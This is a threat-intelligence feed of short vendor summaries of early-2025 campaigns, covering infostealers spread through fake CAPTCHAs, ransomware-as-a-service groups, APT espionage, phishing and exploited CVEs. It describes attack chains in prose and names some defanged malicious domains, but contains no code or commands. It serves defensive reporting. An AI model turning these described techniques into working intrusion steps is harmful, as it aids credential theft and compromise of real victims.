Source: https://www.cyfirma.com/research/windows-locker-ransomware/
2025-02-01
Clipboard_Hijacker_Delivers_Lumma_Stealer
LOW
+
Intel Source:
Threatdown
Intel Name:
Clipboard_Hijacker_Delivers_Lumma_Stealer
Date of Scan:
2025-02-01
Impact:
LOW
Summary:
Researchers from Threatdown have observed that cybercriminals are leveraging clipboard hijacking and fake CAPCHAs to trick users into executing malicious commands. The attackers are creating fake CAPCHA on fraudulent websites including fake online store, news sites and platforms offering music and movies. They are delivering Lumma stealer malware using malicious command copied to the clipboard which relies on the MSHTA tool to download and run a PowerShell script hidden in an image file called Nusku.jpeg.
Source: https://www.threatdown.com/blog/more-cybercriminals-are-using-the-clipboard-hijacker-method/
2025-02-01
Email_Bombing_Campaign
LOW
+
Intel Source:
ESentire
Intel Name:
Email_Bombing_Campaign
Date of Scan:
2025-02-01
Impact:
LOW
Summary:
Esentire researchers have identified a campaign where attackers are using the Email Bombing tactic to compromise organisation. In this campaign, recipients receive a massive flood of spam emails and after that they get a message on MS teams from fake IT support team that takes advantage of MS Teams settings. Fake IT team claims they can fix the issue and request a remote session. Once the victim agrees to the session, the attackers gain control of the system and sliently install malware that allow them to stay in the system to steal credentials, exfiltrate sensitive data and potentially deploy ransomware.
Source: https://www.esentire.com/security-advisories/ongoing-email-bombing-campaigns-leading-to-remote-access-and-post-exploitation
2025-02-01
GamaCopy_Targets_Russian_Entities
MEDIUM
+
Intel Source:
knownsec 404
Intel Name:
GamaCopy_Targets_Russian_Entities
Date of Scan:
2025-02-01
Impact:
MEDIUM
Summary:
Researchers from the Knownsec 404 Advanced Threat Intelligence team have discovered a threat actor known as "GamaCopy," who is copying the tactics of the Russian-linked Gamaredon gang to conduct attacks against Russian-speaking targets. Using military-related content as bait, the attackers use 7z self-extracting programs to deliver payloads and then use open-source tools like UltraVNC for further action.
Source: https://paper.seebug.org/3270/
2025-02-01
HellCat_and_Morpheus_RaaS_Operators
MEDIUM
+
Intel Source:
SentinelOne
Intel Name:
HellCat_and_Morpheus_RaaS_Operators
Date of Scan:
2025-02-01
Impact:
MEDIUM
Summary:
Sentinel reseachers have observed the rise of two prominent RaaS operations called HellCat and Morpheus. These operations allow their affiliates to use pre-built ransomware tool in exchange of some share of profits. HellCat first appeared in mid-2024 and aim to establish strong position in cybercrime arena. It is operated by member of BreachForums community such as Rey, Pryx, Grep and IntelBroker which primarily targets government entities. On the other hand, Morpheus has launched its data leak site in Dec-24 and operates as semi-private RaaS. They target on pharmaceuticals and manufacturing sector with particular focus on exploiting VMware ESXi environments.
Source: https://www.sentinelone.com/blog/hellcat-and-morpheus-two-brands-one-payload-as-ransomware-affiliates-drop-identical-code/
2025-01-31
UAC_0063_Cyber_Espionage_Unveiled
LOW
+
Intel Source:
Bitdefender
Intel Name:
UAC_0063_Cyber_Espionage_Unveiled
Date of Scan:
2025-01-31
Impact:
LOW
Summary:
Researchers at Bitdefender have discovered a sophisticated cyber-espionage operation by UAC-0063, a threat group that is spreading its activities from Central Asia to European countries. This actor initially targeted government entities and diplomatic missions in Central Asia, but has now expanded its scope to include embassies in Germany, the United Kingdom, the Netherlands, Romania, and Georgia.
Source: https://www.bitdefender.com/en-us/blog/businessinsights/uac-0063-cyber-espionage-operation-expanding-from-central-asia
2025-01-31
Exploitation_of_CVE_2019_18935_in_IIS
MEDIUM
+
Intel Source:
Esentire
Intel Name:
Exploitation_of_CVE_2019_18935_in_IIS
Date of Scan:
2025-01-31
Impact:
MEDIUM
Summary:
Researchers at eSentire have found threat actors who are abusing CVE-2019-18935, a six-year-old vulnerability in Progress Telerik UI for ASP.NET AJAX. In early January 2025, eSentire's Threat Response Unit discovered attackers utilizing the IIS worker process (w3wp.exe) to load a reverse shell and run reconnaissance commands via cmd.exe. Before gaining remote access, the attackers analyzed IIS logs for a weak file upload handler and used a tailored proof-of-concept (PoC) exploit.
Source: https://www.esentire.com/blog/threat-actors-use-cve-2019-18935-to-deliver-reverse-shells-and-juicypotatong-privilege-escalation-tool
2025-01-31
Fake_CAPTCHA_Scam_Targets_Crypto_Users
LOW
+
Intel Source:
Morphisec
Intel Name:
Fake_CAPTCHA_Scam_Targets_Crypto_Users
Date of Scan:
2025-01-31
Impact:
LOW
Summary:
Researchers from Morphisec have discovered a new operation in which fraudsters exploit false CAPTCHA verification systems to send malware to cryptocurrency groups. The attack begins on the X platform (previously Twitter), where threat actors hijack legitimate threads to trick users into joining Telegram groups. Once entered, victims are encouraged to pass a CAPTCHA with a bot that looks like "Safeguard," which results in the distribution of Lumma Stealer malware via loaders such as IDAT Loader and Emmenthal Loader.
Source: https://www.morphisec.com/blog/captcha-chaos-lumma-stealer/
2025-01-31
Phishing_Attacks_Exploit_Cloudflare
LOW
+
Intel Source:
cloudsek
Intel Name:
Phishing_Attacks_Exploit_Cloudflare
Date of Scan:
2025-01-31
Impact:
LOW
Summary:
Researchers from the CloudSEK Threat Research Team have found an efficient phishing page that can impersonate any brand while stealing user credentials via a generic login interface. The phishing site, hosted on Cloudflare's workers.dev, effectively customizes incidents by attaching employee email addresses to their URLs, allowing for targeted campaigns. To trick victims, the site takes a screenshot of the domain connected with the target's email address (via thum.io) and displays it as the background.
Source: https://www.cloudsek.com/blog/unmasking-cyber-deception-the-rise-of-generic-phishing-pages-targeting-multiple-brands
2025-01-31
DeepSeek_Crypo_Phishing_Scams
LOW
+
Intel Source:
Cyble
Intel Name:
DeepSeek_Crypo_Phishing_Scams
Date of Scan:
2025-01-31
Impact:
LOW
Summary:
Cyble researchers have uncovered a new campaign related to multiple fraudulent websites impersonating DeepSeek which are part of cryptocurrency phishing schemes and investment scams. DeepSeek is Chinese AI company that recently launched its chat bot DeepSeek – AI Assistant. The attackers are taking advantage and creating deceptive websites that closely mimic the legitimate DeepSeek platform to lure users into scanning QR code to connect their cryptocurrency wallets such as MetaMask or WalletConnect. When user scans the QR code, their wallet credentials are stolen, leading to complete loss of their funds.
Source: https://cyble.com/blog/deepseeks-growing-influence-sparks-a-surge-in-frauds-and-phishing-attacks/
2025-01-31
Coyote_Banking_Trojan
LOW
+
Intel Source:
Fortinet
Intel Name:
Coyote_Banking_Trojan
Date of Scan:
2025-01-31
Impact:
LOW
Summary:
Researchers from Fortinet have identified several malicious LNK files that use PowerShell commands to executes malicious scripts and connect to remote servers to deliver Coyote Banking Trojan to infect victims. This trojan mainly target Brazil and its goal is to steal sensitive information over 70 financial applications and numerous websites. Once deployed on a victim’s system, it performs multiple malicious activities such as keylogging, taking screenshots and displaying fake login pages to lure users into entering their banking credentials which helps cybercriminals to gain access of users banking accounts and steal financial data.
Source: https://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files
2025-01-31
From_PowerShell_to_a_Python_Obfuscation_Race
LOW
+
Intel Source:
ISC.SANS
Intel Name:
From_PowerShell_to_a_Python_Obfuscation_Race
Date of Scan:
2025-01-31
Impact:
LOW
Summary:
The malware uses PowerShell to download a fake document and set up a Python environment. It then deploys an InfoStealer that targets cryptocurrency wallet extensions in browsers, exfiltrating data via Telegram bots. The malware is heavily obfuscated with multiple layers of encoding and encryption to evade detection. Key indicators include malicious PowerShell scripts, Python environment setup, and cryptocurrency theft via clipboard hijacking and wallet address replacement.
Source: https://isc.sans.edu/diary/From+PowerShell+to+a+Python+Obfuscation+Race/31634/
2025-01-30
Unmasking_the_Shadow_of_PoisonPlug
MEDIUM
+
Intel Source:
Mandiant
Intel Name:
Unmasking_the_Shadow_of_PoisonPlug
Date of Scan:
2025-01-30
Impact:
MEDIUM
Summary:
Google/Manidant researcher have uncovered Chinese cyber-espionage operations targeting entities in Europe and the Asia-Pacific (APAC)region. These operations leverage a backdoor called POISONPLUG with a special variant POISONPLUG.SHADOW. The POISONPLUG is used by Chinese threat actor but POISONPLUG.SHADOW seems to be linked with APT41. This malware uses an advanced tool called ScatterBrain which is hard to detect and analyze. It works in three different modes: Selective, Complete and Complete headerless, each offering a different level of obfuscation. The Selective mode is used for early stages of an attack such as dropper while the other modes are used for more advanced parts of the attack like the final backdoor payload.
Source: https://cloud.google.com/blog/topics/threat-intelligence/scatterbrain-unmasking-poisonplug-obfuscator/
2025-01-30
SparkRAT_Malware_Target_Multiple_Operating_Systems
LOW
+
Intel Source:
Hunt.IO
Intel Name:
SparkRAT_Malware_Target_Multiple_Operating_Systems
Date of Scan:
2025-01-30
Impact:
LOW
Summary:
Researchers from Hunt.IO have uncovered a SparkRAT that has been active on Github since 2022. It is written in Go programming language and uses the WebSocket protocol to communicate with its C2 servers. This malware is popular among cybercriminals because of its flexible design, user friendly interface and multi-platform support for Windows, MacOS and Linux systems. It has multiple capabilities such as control files and programs, run system commands, steal sensitive data, take screenshots and even shut down and restart a system.
Source: https://hunt.io/blog/sparkrat-server-detection-macos-activity-and-malicious-connections
2025-01-30
New_Phishing_Campaign_Impersonating_Amazon
LOW
+
Intel Source:
Palo Alto
Intel Name:
New_Phishing_Campaign_Impersonating_Amazon
Date of Scan:
2025-01-30
Impact:
LOW
Summary:
PaloAlto researchers have identified campaign in which attackers are targeting Amazon prime members to steal their credit card details. The attackers send emails with malicious PDF attachments that appear legitimate. These PDFs contain links which redirect the users through a series of URLs before going to fake Amazon official page. This deceive site is designed to trick users into entering their credit card information which is then stolen by the attackers.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-24-IOCs-for-phishing-campaign-impersonating-amazon.txt
2025-01-30
Lynx_The_Ransomware_as_a_Service_Group
MEDIUM
+
Intel Source:
Group-IB
Intel Name:
Lynx_The_Ransomware_as_a_Service_Group
Date of Scan:
2025-01-30
Impact:
MEDIUM
Summary:
Researchers at Group-IB have discovered a new RaaS group called Lynx that provide advanced tools and structured platform to its affiliates to lunch the ransomware attacks. The affiliate panel is user-friendly and divided into multiple sections such as News, Companies, Chats, Stuffers and Leaks. these allow them to manage victim profiles, customize ransomware payloads and schedule data leaks from a single interface. The group provides a ransomware tookit called All-in-One Archive which work across various system like window, Linux and ESXi to ensures they can target different IT environment. They use double extortion tactics and allow affiliates to customize encryption settings based on attack requirements.
Source: https://www.group-ib.com/blog/cat-s-out-of-the-bag-lynx-ransomware/
2025-01-30
Astral_Stealer
LOW
+
Intel Source:
Cyfirma
Intel Name:
Astral_Stealer
Date of Scan:
2025-01-30
Impact:
LOW
Summary:
Researchers from Cyfirma have identified an Astral stealer which is designed to steal sensitive information and maintain persistence on infected systems. It is written in python, C# and Java and has multiple functions such as credential dumping, browser injection and data exfiltration through webhooks. It is available on Github where attackers can use its built-in features. This stealer also offers some paid features such as tracking backup codes, automatically changing email addresses, capturing new credit cards and passwords and other targeted platforms.
Source: https://www.cyfirma.com/research/astral-stealer-analysis/
2025-01-30
Exploitation_of_HTTP_Clients_in_ATO_Attacks
MEDIUM
+
Intel Source:
Proofpoint
Intel Name:
Exploitation_of_HTTP_Clients_in_ATO_Attacks
Date of Scan:
2025-01-30
Impact:
MEDIUM
Summary:
Proofpoint findings reveal that 78% of Microsoft 365 tenants were targeted by account takeover attempts using distinct HTTP clients. While most attacks rely on brute force methods with low success rates, a campaign using the Axios client had a 43% success rate in compromising accounts. Researchers also identified a high-velocity brute force campaign using the Node Fetch client. Attackers are increasingly repurposing legitimate HTTP client tools, often sourced from public repositories, to carry out attacks like Adversary-in-the-Middle (AitM) and brute force techniques, leading to increased account takeover incidents.
Source: https://www.proofpoint.com/us/blog/threat-insight/http-client-tools-exploitation-account-takeover-attacks
2025-01-29
Phorpiex_Botnet_Delivers_LockBit_Ransomware
MEDIUM
+
Intel Source:
Cybereason
Intel Name:
Phorpiex_Botnet_Delivers_LockBit_Ransomware
Date of Scan:
2025-01-29
Impact:
MEDIUM
Summary:
Cybereason researchers have identified an infamous botnet called Phorpiex also known as Trik that has been active since 2010 and is known for spam campaigns, cryptocurrency mining and post-exploitation malware. The attackers leverage the Phorpiex botnet to deliver Lockbit Black ransomware (aka Lockbit 3.0) because this variant download and executes the ransomware automatically. The botnet primarily distributes through phishing emails which contain attachment such as Microsoft Word documents, PDFs or executables. The botnet operators offer this as a Botnet-as-a-service to other cybercriminals, allowing them to distribute ransomware like LockBit efficiently.
Source: https://www.cybereason.com/blog/threat-analysis-phorpiex-downloader
2025-01-29
SapphireRAT_Targeting_Latin_American
LOW
+
Intel Source:
Cofense
Intel Name:
SapphireRAT_Targeting_Latin_American
Date of Scan:
2025-01-29
Impact:
LOW
Summary:
Cofense researcher have uncovered a series of attacks that leverage fake legal documents like judicial receipts to distribute and run Sapphire RAT. They hide the malware in deceive legal documents and trick the recipient into the opening and running it. When the victim opens the document and runs the file, the malware activates and gives the attacker control of victim’s system so that they can steal important data or disrupt key operations. These attacks mainly target organisation in Latin America where attackers are targeting valuable data and critical infrastructure.
Source: https://cofense.com/blog/malware-alert-fake-judicial-review-emails-deliver-sapphirerat-targeting-latin-american-victims
2025-01-29
SystemBC_RAT_Targeting_Linus_Based_Platforms
LOW
+
Intel Source:
Any.Run
Intel Name:
SystemBC_RAT_Targeting_Linus_Based_Platforms
Date of Scan:
2025-01-29
Impact:
LOW
Summary:
Any.Run researchers have uncovered a SystemBC RAT targeting Linux-based platforms. The RAT is used to create proxy implants inside victim’s networks and target internal corporate services such as company network, cloud servers and IoT devices. A proxy implant allows attackers to move around the network without being noticed. It uses encrypted communication channel with its C2 servers to ensure the implant stays connected to the attacker’s network even across different system like Window and Linux.
Source: https://x.com/anyrun_app/status/1884207667058463188
2025-01-29
Attackers_Exploit_Government_Website
LOW
+
Intel Source:
Cofense
Intel Name:
Attackers_Exploit_Government_Website
Date of Scan:
2025-01-29
Impact:
LOW
Summary:
Confense researchers have uncovered that threat actors have been exploiting .gov domains from various countries for phishing attack over past two years. They use these domains to host phishing pages, redirect users to malicious websites or act as C2 server for malware. Most of the compromised .gov domains linked to CVE-2024-25608, a vulnerability in the Liferay digital platform widely used by government organizations which allow attacker to redirect user from legitimate website to phishing sites. Brazil and the U.S are most affected countries by this phishing attack.
Source: https://cofense.com/blog/threat-actors-exploit-government-website-vulnerabilities-for-phishing-campaigns
2025-01-28
Ransomware_Groups_Targeting_Healthcare_Sector
MEDIUM
+
Intel Source:
Any.Run
Intel Name:
Ransomware_Groups_Targeting_Healthcare_Sector
Date of Scan:
2025-01-28
Impact:
MEDIUM
Summary:
Any.Run researchers have observed that many ransomware groups are targeting healthcare sector because it is underfunded and has vulnerable infrastructure which make them easy and profitable targets. The attackers encrypt health data and demand ransomware. Moreover, many healthcare systems can afford the downtimes because it impacts patient care. Interlock is one of the prominent ransomware groups has been targeting healthcare sector with double extortion tactics. In 2024, it has targeted multiple healthcare facilities in the United states to disrupting operations and exfiltrating patient information.
Source: https://any.run/cybersecurity-blog/interlock-ransomware-attack-analysis/
2025-01-28
Phishing_Pages_Targeting_Online_Shoppers
LOW
+
Intel Source:
Palo Alto
Intel Name:
Phishing_Pages_Targeting_Online_Shoppers
Date of Scan:
2025-01-28
Impact:
LOW
Summary:
Researchers at PaloAlto uncovered a campaign where attackers target victims by impersonating well known online shopping websites. These fake sites leverage the same template and design to appear legitimate. This campaign started in Nov. 2024 which entice users to enter their phone number and password on counterfeit login page. Once user enter their credentials, the message shows “This account does not exist”. However, the credentials are sent to attacker’s server instead of being validated.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-24-IOCs-for-phishing-pages-targeting-online-shoppers.txt
2025-01-27
Lumma_Stealer_Malware_Update
LOW
+
Intel Source:
Esentire
Intel Name:
Lumma_Stealer_Malware_Update
Date of Scan:
2025-01-27
Impact:
LOW
Summary:
Esentire researchers have observed that the developers of Lumma Stealer now use the ChaCha20 cipher to decrypt its configuration files. Lumma Stealer also known as LummaC2 Stealer which steals sensitive information and operated as a MaaS. This malware is often distributed through Clickfix initial method where victims are tricked into executing malicious commands.
Source: https://www.esentire.com/blog/lumma-stealer-malware-updated-to-use-chacha20-cipher-for-config-decryption
2025-01-23
Secret_Blizzard_Part2
LOW
+
Intel Source:
Microsoft
Intel Name:
Secret_Blizzard_Part2
Date of Scan:
2025-01-23
Impact:
LOW
Summary:
Microsoft Threat Intelligence has reported that the Russian nation-state actor known as Secret Blizzard has been exploiting the tools and infrastructure of other cybercriminal groups to target Ukrainian military devices. Between March and April 2024, Secret Blizzard used the Amadey bot malware, associated with the cybercriminal group Storm-1919, to deploy its custom backdoors, including Tavdig and KazuarV2, on select Ukrainian military systems. This marks the second time since 2022 that Secret Blizzard has leveraged cybercrime infrastructure to gain access to its targets. Additionally, Secret Blizzard has co-opted tools from another Russian threat actor, Storm-1837, which focuses on Ukrainian military drone operators, to further infiltrate and compromise devices. These activities reflect a strategic approach by Secret Blizzard to diversify its attack vectors, including spear phishing, web compromises, and adversary-in-the-middle campaigns, while focusing on long-term espionage, particularly against defense-related sectors.
Source: https://www.microsoft.com/en-us/security/blog/2024/12/11/frequent-freeloader-part-ii-russian-actor-secret-blizzard-using-tools-of-other-groups-to-attack-ukraine/
2025-01-23
Clop_Exploits_Cleo_Vulnerabilities
LOW
+
Intel Source:
Imperva
Intel Name:
Clop_Exploits_Cleo_Vulnerabilities
Date of Scan:
2025-01-23
Impact:
LOW
Summary:
Researchers at Imperva have discovered the Clop ransomware group leveraging critical vulnerabilities (CVE-2024-50623 and CVE-2024-55956) in Cleo software used for secure file sharing. These weaknesses enable attackers to run remote code and import illegal commands, resulting in data exfiltration and malicious payload execution. Imperva has tracked over 1 million exploitation attempts against almost 10,000 sites, with a primary focus on the United States and Australia, affecting areas such as finance and the government.
Source: https://www.imperva.com/blog/imperva-protects-against-the-exploited-cves-in-the-cleo-data-theft-attacks/
2025-01-22
InvisibleFerret_Malware
LOW
+
Intel Source:
Any.Run
Intel Name:
InvisibleFerret_Malware
Date of Scan:
2025-01-22
Impact:
LOW
Summary:
Any.run researcher have observed an increase in North Korean cyber espionage campaigns using fake job interview tactics to distribute malware. There are two new malware such as BeaverTail and InvisibleFerret being distributed as a part of this campaign. This campaign also known as Contagious Interview or DevPopper which targets individuals in the tech, financial and cryptocurrency sector. BeaverTail malware is an initial malware that downloads custom python environment and deploys InvisibleFerret. The InvisibleFerret operates sliently without leaving any traces or logs.
Source: https://any.run/cybersecurity-blog/invisibleferret-malware-analysis/
2025-01-22
Critical_Fortinet_Zero_Day_CVE_2024_55591
LOW
+
Intel Source:
Cyble
Intel Name:
Critical_Fortinet_Zero_Day_CVE_2024_55591
Date of Scan:
2025-01-22
Impact:
LOW
Summary:
Researchers at Cyble have observed a major zero-day vulnerability, CVE-2024-55591, in the FortiOS and FortiProxy products, which attackers are actively exploiting to get superadmin privileges. This authentication bypass vulnerability, which has a CVSSv3 score of 9.6, exploits flaws in the Node.js WebSocket module, allowing unauthorized access to administrative services.
Source: https://cyble.com/blog/cve-2024-55591-the-fortinet-flaw-putting-critical-systems-at-risk/
2025-01-22
SilentLynx_APT_Targets_Kyrgyzstan
LOW
+
Intel Source:
Seqrite
Intel Name:
SilentLynx_APT_Targets_Kyrgyzstan
Date of Scan:
2025-01-22
Impact:
LOW
Summary:
Researchers from Seqrite Labs have uncovered two campaigns conducted by threat actor called Silent Lynx which targets organisation in Eastern Europe and Central Aisa. This group focuses on entities such as government think tanks, banking sectors and economic decision-making bodies. The attackers are targeting Kyrgyzstan in their recent campaigns. First campaign is related to National Bank of the Kyrgyz Republic while the second campaign targets the Ministry of Finance of Kyrgyzstan. Both the campaigns start with phishing emails which contains the RAR file attachment with fake document to distract the victim.
Source: https://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/
2025-01-21
Phishing_Campaign_Targets_Financial_Data
LOW
+
Intel Source:
CERT-AGID
Intel Name:
Phishing_Campaign_Targets_Financial_Data
Date of Scan:
2025-01-21
Impact:
LOW
Summary:
Researchers from CERT-AGID have uncovered an ongoing phishing campaign targeting individuals by impersonating Ministry of Health. In this campaign, the attackers use the Ministry’s logo and name in their emails to lure victims into providing sensitive information by claiming a refund of €265.67 from the National Health Service and contain a link that redirect the recipients to a fake page where they are asked to enter their personal details and credit card information. Victims are then asked to re-enter their card information on a second page which increase the chances of attackers to collect additional data.
Source: https://cert-agid.gov.it/news/false-comunicazioni-del-ministero-della-salute-sfruttate-per-phishing-finanziario/
2025-01-21
Raspberry_Robin_Update_Exploits_CVE_2024_38196
LOW
+
Intel Source:
Zscaler ThreatLabz
Intel Name:
Raspberry_Robin_Update_Exploits_CVE_2024_38196
Date of Scan:
2025-01-21
Impact:
LOW
Summary:
Raspberry Robin, a malware strain, has recently been updated to include a privilege escalation exploit targeting CVE-2024-38196. This vulnerability allows attackers to elevate their privileges on affected systems, potentially enabling them to gain unauthorized access or perform malicious actions with elevated permissions.
Source: https://x.com/Threatlabz/status/1879956781360976155
2025-01-21
Nnice_Ransomware_Targeting_Windows
MEDIUM
+
Intel Source:
Cyfirma
Intel Name:
Nnice_Ransomware_Targeting_Windows
Date of Scan:
2025-01-21
Impact:
MEDIUM
Summary:
CYFIRMA researchers have identified a new ransomware strain called Nnice, which is targeting Windows systems. This ransomware uses advanced encryption techniques, appending the .xdddd extension to encrypted files. It also changes the system wallpaper and leaves a ransom note ("Readme.txt") with recovery instructions.
Source: https://www.cyfirma.com/research/nnice-ransomware/
2025-01-21
Sliver_Implant_Targets_German_Entities
LOW
+
Intel Source:
Cyble
Intel Name:
Sliver_Implant_Targets_German_Entities
Date of Scan:
2025-01-21
Impact:
LOW
Summary:
Researchers at Cyble have found a sophisticated hack targeting German entities, which used DLL sideloading, proxying techniques, and the Sliver framework. The attack begins with a misleading LNK file placed in an archive, which, when executed, initiates a chain of events involving a genuine program (wksprt.exe) that sideloads a malicious DLL.
Source: https://cyble.com/blog/sliver-implant-targets-german-entities-with-dll-sideloading-and-proxying-techniques/
2025-01-21
Return_of_QBot
LOW
+
Intel Source:
Walmart Global Tech
Intel Name:
Return_of_QBot
Date of Scan:
2025-01-21
Impact:
LOW
Summary:
QBot also known as Pinkslipbot is a malware which has been active since 2007. Initially, It started as banking trojan that steal financial information but now has become a flexible tool for stealing data and distributing other malware through C2 servers. Law enforcement agencies has disrupted QBot’s operation in May 2024 but recent signs indicate that the operators are active again. Moreover, this group has developed new malware called Backconnect which is linked to ransomware operators specially BlackBasta.
Source: https://medium.com/walmartglobaltech/qbot-is-back-connect-2d774052369f
2025-01-19
IoT_Botnet_Targets_Global_Networks
LOW
+
Intel Source:
Trend Micro
Intel Name:
IoT_Botnet_Targets_Global_Networks
Date of Scan:
2025-01-19
Impact:
LOW
Summary:
Researchers at Trend Micro have observed large-scale DDoS attacks orchestrated by an IoT botnet, especially targeting enterprises in Japan but also abroad. The botnet, which includes malware variants inspired from Mirai and Bashlite, attacks IoT devices such as wireless routers and IP cameras by exploiting vulnerabilities and weak passwords. These infected devices communicate with command-and-control servers, launching various DDoS attacks, upgrading malware, and enabling proxy services.
Source: https://www.trendmicro.com/en_us/research/25/a/iot-botnet-linked-to-ddos-attacks.html
2025-01-19
SEO_Manipulation_by_Gootloader
LOW
+
Intel Source:
sophos
Intel Name:
SEO_Manipulation_by_Gootloader
Date of Scan:
2025-01-19
Impact:
LOW
Summary:
Researchers at Sophos have recreated the server-side activities of the Gootloader virus, which is an SEO-driven threat that uses infected WordPress sites to entice victims. Gootloader uses hijacked Google search results to send users to legitimate sites that have been altered to display simulated message boards with malware links embedded in seemingly relevant talks.
Source: https://news.sophos.com/en-us/2025/01/16/gootloader-inside-out/
2025-01-18
RansomHub_Affiliate_Uses_Python_Based_Backdoor
MEDIUM
+
Intel Source:
GuidePoint
Intel Name:
RansomHub_Affiliate_Uses_Python_Based_Backdoor
Date of Scan:
2025-01-18
Impact:
MEDIUM
Summary:
GuidePoint security researchers have uncovered Python-based backdoor being used by a threat actor to maintain access to compromised devices. The attack starts with initial access through fake malware updates which often impersonate legitimate software updates to trick users and after 20 minutes of initial infection, the Python backdoor is installed on the compromised device. The attackers then use RDP to spread the infection to the other systems in the network and deploy more Python backdoors. The attackers ultimately leverage their access to deploy RansomHub ransomware across the network for encrypting the data.
Source: https://www.guidepointsecurity.com/blog/ransomhub-affiliate-leverage-python-based-backdoor/
2025-01-18
Analyzing_a_Web_Shell_Intrusion
LOW
+
Intel Source:
Trend Micro
Intel Name:
Analyzing_a_Web_Shell_Intrusion
Date of Scan:
2025-01-18
Impact:
LOW
Summary:
Trend Micro researchers investigated a customer incident involving suspicious activity detected by endpoint sensors. The IIS worker (w3wp.exe) on a public-facing server was compromised when an attacker uploaded a web shell, which was initially unrestricted. This allowed the attacker to create a new account and modify an existing user's password. The attacker also used an encoded PowerShell command to establish a reverse TCP shell for command-and-control communication. Further investigation revealed multiple payloads downloaded to the system, and the attacker’s initial access was traced through web server requests interacting with the web shell.
Source: https://www.trendmicro.com/en_us/research/25/a/investigating-a-web-shell-intrusion-with-trend-micro--managed-xd.html
2025-01-18
Nickel_Tapestry_Fraud_Connections
LOW
+
Intel Source:
Secureworks
Intel Name:
Nickel_Tapestry_Fraud_Connections
Date of Scan:
2025-01-18
Impact:
LOW
Summary:
Researchers at Secureworks Counter Threat Unit have discovered linkages between North Korean IT worker schemes and a 2016 crowdfunding scam. The schemes, attributed to the NICKEL TAPESTRY threat group, included front firms such as Yanbian Silverstar in China and Volasys Silver Star in Russia, both of which were sanctioned by the United States Department of Treasury in 2018.
Source: https://www.secureworks.com/blog/nickel-tapestry-infrastructure-associated-with-crowdfunding-scheme
2025-01-18
FortiGate_Firewalls_Targeted_by_Exploited_Zero_Day
MEDIUM
+
Intel Source:
Arctic Wolf
Intel Name:
FortiGate_Firewalls_Targeted_by_Exploited_Zero_Day
Date of Scan:
2025-01-18
Impact:
MEDIUM
Summary:
Arctic Wolf Labs researchers have observed a recent campaign targeting Fortinet FortiGate firewalls with exposed management interfaces on the public internet. Threat actors gained unauthorized access, creating new accounts, modifying configurations, and extracting credentials. While the initial access vector remains unconfirmed, there is high confidence that a zero-day vulnerability is involved.
Source: https://arcticwolf.com/resources/blog/console-chaos-targets-fortinet-fortigate-firewalls/
2025-01-17
Deep_Dive_Into_a_Linux_Rootkit_Malware
LOW
+
Intel Source:
Fortinet
Intel Name:
Deep_Dive_Into_a_Linux_Rootkit_Malware
Date of Scan:
2025-01-17
Impact:
LOW
Summary:
Fortinet researchers have analyzed rootkit malware that infects Linux systems using zero-day exploit. The malware has two components - kernel module and a user-space program. The kernel module creates hidden communication channel by using Linux system file and hijack network traffic. It establishes a secure session and processes encrypted commands which enable the attacker to restart processes or execute system commands with root privileges. The user-space program pretends to be normal but secretly runs the attacker's commands in the background coordinating with the kernel module.
Source: https://www.fortinet.com/blog/threat-research/deep-dive-into-a-linux-rootkit-malware
2025-01-17
Exploitation_of_Aviatrix_Controller_Vulnerability
MEDIUM
+
Intel Source:
WIZ
Intel Name:
Exploitation_of_Aviatrix_Controller_Vulnerability
Date of Scan:
2025-01-17
Impact:
MEDIUM
Summary:
A critical vulnerability CVE-2024-50603 has been identified that affects the Aviatrix Controller which allow attackers to execute commands on the system remotely without authentication. This vulnerability happens because the software does not properly handle user input in its API. The impact of this vulnerability is severe when the Aviatrix Controller is deployed in AWS cloud environments because it can also give attackers high privilege accesses. Researchers also observed that attackers exploiting this flaw in the wild to mine cryptocurrency and install backdoors.
Source: https://www.wiz.io/blog/wiz-research-identifies-exploitation-in-the-wild-of-aviatrix-cve-2024-50603
2025-01-17
KongTuke_Campaign_Exploits_BOINC
LOW
+
Intel Source:
PaloAlto
Intel Name:
KongTuke_Campaign_Exploits_BOINC
Date of Scan:
2025-01-17
Impact:
LOW
Summary:
KongTuke is a malicious campaign involving injected scripts that create fake "verify you are human" pages on websites. These pages trick users into executing a malicious PowerShell script by copying it into their clipboard and following instructions to run it. The script leads to an infection that exploits BOINC (Berkeley Open Infrastructure for Network Computing), a legitimate platform often used by research organizations. The attackers set up rogue BOINC project servers with domains like rosettahome[.]cn and rosettahome[.]top, attempting to disguise them as legitimate rosetta@home servers. However, these servers are unrelated to rosetta@home and are used for malicious purposes in the campaign.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-13-IOCs-for-Kongtuke-activity.txt
2025-01-17
Star_Blizzard_Targets_WhatsApp_Accounts
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
Star_Blizzard_Targets_WhatsApp_Accounts
Date of Scan:
2025-01-17
Impact:
MEDIUM
Summary:
Microsoft researchers have identified that Russian threat actor known as Star Blizzard is using new tactic to target victims through WhatsApp. This group often targets government officials, diplomats, defense policy researchers and those aiding Ukraine in the war with Russia. In this campaign, they leverage spear-phishing emails impersonating a U.S. government official that contain QR code which encourage users to join WhatsApp group supporting Ukraine NGOs. However, the QR code is non- functional then user responds and attackers send another email containing a link which redirects the target to a webpage where they are asked to scan a fake QR code linked to WhatsApp account to attacker’s device. This allows the attacker to access the victim’s WhatsApp messages and potentially steal data using browser plugins.
Source: https://www.microsoft.com/en-us/security/blog/2025/01/16/new-star-blizzard-spear-phishing-campaign-targets-whatsapp-accounts/
2025-01-16
SharpRhino_A_New_RAT_Malware
LOW
+
Intel Source:
Acronis
Intel Name:
SharpRhino_A_New_RAT_Malware
Date of Scan:
2025-01-16
Impact:
LOW
Summary:
Researchers at Acronis have discovered a new RAT called SharpRhino developed by Hunters International which is a RaaS group. This malware first appeared in 2024 and is designed to provide remote control over compromised machine. The malware is delivered to victims as a fake legitimate software installer using Nullsoft Scriptable Install System (NSIS). When the installer runs, it installs a PowerShell script that includes [.]net payloads which enable the malware to communicate with C2 server, allowing attackers to execute commands on the compromised machine.
Source: https://www.acronis.com/en-us/cyber-protection-center/posts/sharprhino-an-old-new-threat/
2025-01-16
Double_Tap_Campaign
MEDIUM
+
Intel Source:
Sekoia
Intel Name:
Double_Tap_Campaign
Date of Scan:
2025-01-16
